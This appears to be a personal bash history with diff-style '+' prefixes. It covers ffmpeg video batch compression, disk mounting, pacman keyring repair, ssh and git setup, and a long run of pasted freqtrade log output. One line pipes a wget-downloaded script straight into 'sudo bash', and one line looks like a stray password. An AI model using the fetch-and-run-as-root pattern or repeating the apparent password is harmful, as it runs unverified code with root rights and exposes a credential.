6500-E709a /home/goalador/webentwicklung/webappcreations/Firma/Finanzen/Krankkenkasse/Zfa-schreiben.pdf +yaourt cardano +wget -q -O -support/add_udev_rules.sh | sudo bash +exit +df -h . +df -h /backup +df -h . +ls +ls -ah +ls -hal +ffmpeg -i C0058.MP4 -preset veryslow -crf 25 -b:a 512k -c:a aac -strict -2 c0058_small.mp4 +ls +mplayer c0058_small.mp4 +ls -hal +mplayer C0073.MP4 +ls +mplayer C0076.MP4 +ls +mplayer C0084.MP4 +ls +rm -rf C0058.MP4 +mplayer C0076.MP4 +ls +mplayer C0073.MP4 +ls +ls +ls +#ffmpeg -i C0073.MP4 -preset veryslow -crf 25 -b:a 512k -c:a aac -strict -2 c0073_small.mp4 +ls -hal +mplayer C0073.MP4 +mplayer c0058_small.mp4 +ffmpeg -i C0073.MP4 -preset veryslow -crf 25 -b:a 512k -c:a aac -strict -2 c0073_small.mp4 +ls +rm -rf C0073.MP4 +mplayer C0076.MP4 +ls +mkdir Adil +mplayer C0056.MP4 +ls +mplayer C0056.MP4 +mplayer -ni C0056.MP4 +ls +ffmpeg -i C0056.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 c0056_small.mp4 +ls +ls -hal +mplayer c0056_small.mp4 +ls +mplayer C0084.MP4 +ffmpeg -i C0084.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 c0084_small.mp4 +ls +ls +mplayer C0084.MP4 +rm -rf C0084.MP4 +ls +rm -rf C0056.MP4 +mplayer C0076.MP4 +ffmpeg -i C0076.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 c0076_small.mp4 +ls +mplayer c0076_small.mp4 +ls +rm -rf C0076.MP4 +ls +mkdir Adil/small +mv c00* Adil/small/ +pwd +ls +ls +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 "$f"; echo "Processing file: $f file..."; done +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 "$f".mp4; echo "Processing file: $f file..."; done +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 "$f.mp4"; echo "Processing file: $f file..."; done +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 "$f.mp4"; echo "Processing file: $f file..."; done +ls +rm -rf C0062.MP4 +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 "$f.mp4"; echo "Processing file: $f file..."; done +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2; echo "Processing file: $f file..."; done +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 "$f"; echo "Processing file: $f file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "{$NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 "${$NAME%_small.mp4}"; echo "Processing file: $NAME file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "{$NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 "${$NAME%.mp4}"; echo "Processing file: $NAME file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "{$NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 "{$NAME%_small.mp4}"; echo "Processing file: $NAME file..."; done +ls +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "{$NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 "{$NAME%.mp4}"; echo "Processing file: $NAME file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 "${NAME%_small.mp4}"; echo "Processing file: $NAME file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 "${NAME_small%.mp4}"; echo "Processing file: $NAME file..."; done +ls +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 "${NAME%_small.mp4}"; echo "Processing file: $NAME file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 "${NAME%.mmp4}"; echo "Processing file: $NAME file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 small/"${NAME%.mp4}"; echo "Processing file: $NAME file..."; done +find . -name '*.MP4' | while read f; do ffmpeg -i "$f" -crf 25 -b:a 512k -c:a aac -strict -2 "small/$f"; echo "Processing file: $f file..."; done +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 small/$f; echo "Processing file: $f file..."; done +ls small/ +rm -rf small/C0047.MP4 +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 small/$f; echo "Processing file: $f file..."; done +ls small/ +rm -rf small/C0047.MP4 +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_$f"; echo "Processing file: $f file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_${NAME%.mp4}"; echo "Processing file: $f file..."; done +find . -name '*.MP4'-exec basename -type f | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_${NAME%.mp4}"; echo "Processing file: $f file..."; done +find . -name '*.MP4' -exec basename \{} -type f | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_${NAME%.mp4}"; echo "Processing file: $f file..."; done +find -L /etc -execdir echo {} +find -L /etc -execdir echo {} ';' | head +find . -name '*.MP4' -exec basename {} \ -type f | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_${NAME%.mp4}"; echo "Processing file: $f file..."; done +find . -name '*.MP4'-type f -exec basename {} \ | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_${NAME%.mp4}"; echo "Processing file: $f file..."; done +find . -name '*.MP4' -type f -exec basename {} \ | while read NAME; do ffmpeg -i "${NAME}" -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_${NAME%.mp4}"; echo "Processing file: $f file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "${NAME +}" -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_${NAME +%.mp4}"; echo "Processing file: $NAME file..."; done +find . -name '*.MP4' -type f | while read NAME; do ffmpeg -i "$(basename NAME)" -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_$(basename NAME%.mp4}"; echo "Processing file: $NAME file..."; done +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_$f"; echo "Processing file: $f file..."; done +find . -name '*.MP4' | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_$f +"; echo "Processing file: $f file..."; done +find . -name '*.MP4' -printf "%f +" | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 "%Y-%m-%d_%H-%M-%S_$f"; echo "Processing file: $f file..."; done +ls +find . -name '*.MP4' -printf "%f +" | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 %Y-%m-%d_%H-%M-%S_$f; echo "Processing file: $f file..."; done +find . -name '*.MP4' -printf "%f +" | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 small_$f; echo "Processing file: $f file..."; done +find . -name '*.MP4' -printf "%f +" | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 "small_$f"; echo "Processing file: $f file..."; done +ls +rm -rf small_C0047.MP4 +rm -rf %Y-%m-%d_%H-%M-%S_C00* +ls +rm -rf *.MP4.mp4 +ls +find . -name '*.MP4' -printf "%f +" | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 "small_$f"; echo "Processing file: $f file..."; done +ls +mplayer small_C0047.MP4 +ls +mv small_C0047.MP4 small/c0047_small.mp4 +ls +ffmpeg -i C0040.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0040_small.mp4 +ls +ffmpeg -i C0043.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0043_small.mp4 +ls +ffmpeg -i C0046.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0046_small.mp4 +ls +ffmpeg -i C0047.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0047_small.mp4 +ls +ls small/ +mplayer small/c0046_small.mp4 +mplayer small/c0047_small.mp4 +ls +ffmpeg -i C0049.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0049_small.mp4 +ls +ffmpeg -i C0051.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0051_small.mp4 +ls +ffmpeg -i C0053.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0053_small.mp4 +ls +ffmpeg -i C0059.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0059_small.mp4 +ls +ffmpeg -i C0064.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0064_small.mp4 +ls +ffmpeg -i C0065.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0065_small.mp4 +ls +ffmpeg -i C0081.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0081_small.mp4 +ls +ls +mplayer * +ls +mplayer c0064_small.mp4 +ls +mplayer c0073_small.mp4 +mplayer c0081_small.mp4 +ls +mplayer c0063_small.mp4 +mplayer c0033_small.mp4 +mplayer c0053_small.mp4 +ls +mplayer c0058_small.mp4 +ls +mplayer c0049_small.mp4 +ls +mplayer c0049_small.mp4 +mplayer c0049_small.mp4 +man mplayer +mplayer c0049_small.mp4 +ls +mplayer c0049_small.mp4 +ls +mplayer c0053_small.mp4 +ls +ls +mplayer c0058_small.mp4 +ls +mplayer c0073_small.mp4 +ls +mplayer c0081_small.mp4 +ls +mplayer c0043_small.mp4 +ls +mplayer c0049_small.mp4 +ls +mplayer c0046_small.mp4 +ls +mplayer c0047_small.mp4 +ls +mplayer c0051_small.mp4 +ls +mplayer c0056_small.mp4 +mplayer c0056_small.mp4 +ls +ffmpeg -i C0082.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0082_small.mp4 +ls +ffmpeg -i C0085.MP4 -crf 25 -b:a 512k -c:a aac -strict -2 small/c0085_small.mp4 +ls +ls /dev +ntfs-3g /dev/sdc1 /mnt/hd +mkdir /mnt/hd +sudo mkdir /mnt/hd +ntfs-3g /dev/sdc1 /mnt/hd +sudo ntfs-3g /dev/sdc1 /mnt/hd +sudo ntfs-3g /dev/sdc2 /mnt/hd +ls /dev +ls /dev +ls /dev +sudo ntfs-3g /dev/sdb /mnt/hd +ls /dev +sudo ntfs-3g /dev/sdc1 /mnt/hd +sudo mount -t hfsplus -o ro,loop,offset=409640,sizelimit=879631488 /dev/sda2 /mnt/mac +sudo mount -t hfsplus -o ro,loop,offset=409640,sizelimit=879631488 /dev/sdc1 /mnt/mac +sudo mkdir /mnt/mac +sudo mount -t hfsplus -o ro,loop,offset=409640,sizelimit=879631488 /dev/sdc1 /mnt/mac +ls +mplayer * +sudo mount -t hfsplus -o ro,loop,offset=409640,sizelimit=879631488 /dev/sdc1 /mnt/mac +ls /dev/ +testdisk /dev/sdc +mount /dev/sdc1 -t hfsplus -o ro,sizelimit=N +sudo mount /dev/sdc1 -t hfsplus -o ro,sizelimit=N +gparted +sudo gparted +sudo mount /dev/sdc2 -t hfsplus -o ro,sizelimit=N +sudo mount /dev/sdc2 -t hfsplus -o ro,sizelimit=N /mnt/mac +ls /mnt/ +sudo mount /dev/sdc2 /mnt/mac -t hfsplus -o ro,sizelimit=N +man mount +sudo mount /dev/sdc2 /mnt/mac/ -t hfsplus -o ro,sizelimit=N +sudo mount /dev/sdc2 /mnt/mac/ +sudo mount /dev/sdc2 /mnt/mac/ -t hfsplus -o ro,sizelimit=N +sudo mount -t hfsplus -o ro,loop,offset=409640,sizelimit=879631488 /dev/sdc2 /mnt/mac +sudo mount -t hfsplus -o ro,loop,offset=409640,sizelimit=N /dev/sdc2 /mnt/mac +sudo mount -t hfsplus -o rw,loop /dev/sdc2 /mnt/mac +sudo umount /mnt/mac +sudo mount -t hfsplus -o rw,loop /dev/sdc2 /mnt/mac +sudo mount -t hfsplus -o rw,loop,force /dev/sdc2 /mnt/mac +sudo umount /mnt/mac +sudo mount -t hfsplus -o rw,loop,force /dev/sdc2 /mnt/mac +sudo umount /mnt/mac +xbacklight -set 1 +07JaN2o17 +docker +ssh rius@eltanin.uberspace.de +yaourt trade +sudo pacman -Syu +sudo pacman -Sy archlinux-keyring manjaro-keyring +sudo pacman-key --populate archlinux manjaro +sudo pacman-key --refresh-keys +sudo pacman-key --refresh-keys +sudo pacman -Sy archlinux-keyring manjaro-keyring +sudo pacman -Sy archlinux-keyring manjaro-keyring +sudo pacman-key --refresh-keys +sudo pacman-key --populate archlinux manjaro +sudo pacman -Sy archlinux-keyring manjaro-keyring +sudo pacman-key --refresh-keys --keyserver pgp.mit.edu +sudo pacman-mirrors -f0 +sudo pacman -Sy archlinux-keyring manjaro-keyring +sudo pacman-key --populate archlinux manjaro +sudo pacman -Sy archlinux-keyring manjaro-keyring +sudo rm -fr /etc/pacman.d/gnupg +sudo pacman-key --init +sudo pacman-key --populate archlinux manjaro +sudo pacman-key --refresh-keys +ssh-keygen +ls +mv digital_ocean* .ssh/ +ls .ssh/ +cat .ssh/digital_ocean.pub +ssh root@ +ssh root@ +ls +cat known_hosts +ls config +cat config +vim config +vim config +ssh root@ +2018-01-11 14:51:53,533 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:51:54,422 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:00,204 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:00,405 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:01,511 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:05,266 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:06,350 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:10,272 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:11,311 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:15,340 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:17,997 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:20,267 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:21,296 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:25,265 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:28,385 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:30,277 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:36,054 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:36,286 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:37,218 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:41,100 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:42,097 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:46,102 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:47,142 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:51,113 - freqtrade - INFO - Checking buy signals to create a new tradetrade with stake_amount: 0.050000 ... +2018-01-11 14:52:55,445 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:52:56,111 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:52:59,235 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:01,114 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:02,404 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:06,127 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:11,986 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:12,131 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:13,258 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:17,043 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:18,080 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:22,039 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:23,052 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:27,067 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:32,913 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:33,566 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:34,552 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:37,971 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:44,009 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:44,064 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:45,121 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:49,059 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:50,045 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:54,078 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:53:54,966 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:53:59,086 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:54:01,767 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +2018-01-11 14:54:04,092 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +2018-01-11 14:54:07,286 - freqtrade.rpc - INFO - *Status:* `Stopping trader...` +2018-01-11 14:54:07,286 - freqtrade - INFO - Stopping trader and cleaning up modules... +root@ubuntu-2gb-fra1-01:~/freqtrade# packet_write_wait: Connection to port 22: Broken pipe +[goalador@gatanda .ssh]$ 2018-01-11 14:51:53,533 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +bash: 2018-01-11: command not found +[goalador@gatanda .ssh]$ 2018-01-11 14:51:54,422 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +bash: 2018-01-11: command not found +[goalador@gatanda .ssh]$ 2018-01-11 14:52:00,204 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +bash: 2018-01-11: command not found +[goalador@gatanda .ssh]$ 2018-01-11 14:52:00,405 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +bash: 2018-01-11: command not found +[goalador@gatanda .ssh]$ 2018-01-11 14:52:01,511 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +bash: 2018-01-11: command not found +[goalador@gatanda .ssh]$ 2018-01-11 14:52:05,266 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +bash: 2018-01-11: command not found +`StoppingStopping`Stopping`Stoppingitution failed +[goalador@gatanda .ssh]$ 2018-01-11 14:54:07,286 - freqtrade.rpc - INFO - *Status:* `Stcleaning +[goalador@gatanda .ssh]$ bash: 2018-01-11: command not found + stake_amount: 0.050000 ... +bash: [goalador@gatanda: command not found + stake_amount: 0.050000 ... +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: 2018-01-11: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ 2018-01-11 14:52:00,204 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: 2018-01-11: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ 2018-01-11 14:52:00,405 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +bash: [goalador@gatanda: command not found +bash: StoppingStcleaning: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ stake_amount: 0.050000 ... +[goalador@gatanda .ssh]$ stake_amount: 0.050000 ... +bash: stake_amount:: command not found +[goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ stake_amount: 0.050000 ... +[goalador@gatanda .ssh]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ 2018-01-11 14:52:00,204 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: 2018-01-11: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ `StoppingStopping`Stopping`Stoppingitution failed +> [goalador@gatanda .ssh]$ 2018-01-11 14:54:07,286 - freqtrade.rpc - INFO - *Status:* `Stcleaning +bash: StoppingStopping: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: 2018-01-11: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ `StoppingStopping`Stopping`Stoppingitution failed +> [goalador@gatanda .ssh]$ 2018-01-11 14:54:07,286 - freqtrade.rpc - INFO - *Status:* `Stcleaning +bash: StoppingStopping: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: 2018-01-11: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ `StoppingStopping`Stopping`Stoppingitution failed +> [goalador@gatanda .ssh]$ 2018-01-11 14:54:07,286 - freqtrade.rpc - INFO - *Status:* `Stcleaning +bash: StoppingStopping: command not found +bash: Stoppingitution: command not found +bash: [goalador@gatanda: command not found +bash: StoppingStcleaning: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ bash: 2018-01-11: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ stake_amount: 0.050000 ... +bash: stake_amount:: command not found +[goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ stake_amount: 0.050000 ... +bash: stake_amount:: command not found +[goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ bash: 2018-01-11: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ 2018-01-11 14:52:00,204 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ bash: 2018-01-11: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ 2018-01-11 14:52:00,405 - freqtrade - INFO - Checking buy signals to create a new trade with stake_amount: 0.050000 ... +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ +[goalador@gatanda .ssh]$ bash: StoppingStcleaning: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ stake_amount: 0.050000 ... +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ stake_amount: 0.050000 ... +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: stake_amount:: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ stake_amount: 0.050000 ... +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ 2018-01-11 14:52:00,204 - freqtrade - INFO - Checked all whitelisted currencies. Found no suitable entry positions for buying. Will keep looking ... +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ bash: 2018bash: bash:: command not found +bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ stake_amount: 0.050000 ... +bash: [goalador@gatanda: command not found +not found +[goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda .ssh]$ [goalador@gatanda .ssh]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda .ssh]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +#dd bs=4M if=archlinux-2017.12.01-x86_64.iso of=/dev/sdb status=progress && sync +ls /dev +dd bs=4M if=archlinux-2017.12.01-x86_64.iso of=/dev/sdb status=progress && sync +ls /dev +exit +redshift& +history +hwclock --show +hwclock --show --debug +sudo hwclock --show --debug +find . -name '*.MP4' -printf "%f +" | while read f; do ffmpeg -i $f -crf 25 -b:a 512k -c:a aac -strict -2 -strftime 1 %Y-%m-%d_%H-%M-%S_$f; echo "Processing file: $f file..."; done +timedatectl set-time "2018-01-24 08:34:00" +redshift& +redshift& +ls +ls +git clone git@albrechthain.git.beanstalkapp.com:/albrechthain/corpwebsite-starterkit.git +ls +cat config +ssh-keygen +ls +cat albrechthain_rsa.pub +vim config +git clone git@albrechthain.git.beanstalkapp.com:/albrechthain/corpwebsite-starterkit.git +vim config +vim ~/.ssh/config +git clone git@albrechthain.git.beanstalkapp.com:/albrechthain/corpwebsite-starterkit.git +git clonestalkapp.com/corpwebsite-starterkit.git +vim ~/.ssh/config +vim ~/.ssh/known_hosts +git clone git@albrechthain.git.beanstalkapp.com:/albrechthain/corpwebsite-starterkit.git +vim ~/.ssh/known_hosts +git clone git@albrechthain.git.beanstalkapp.com:/albrechthain/corpwebsite-starterkit.git +vim ~/.ssh/known_hosts +vim ~/.ssh/config +cat 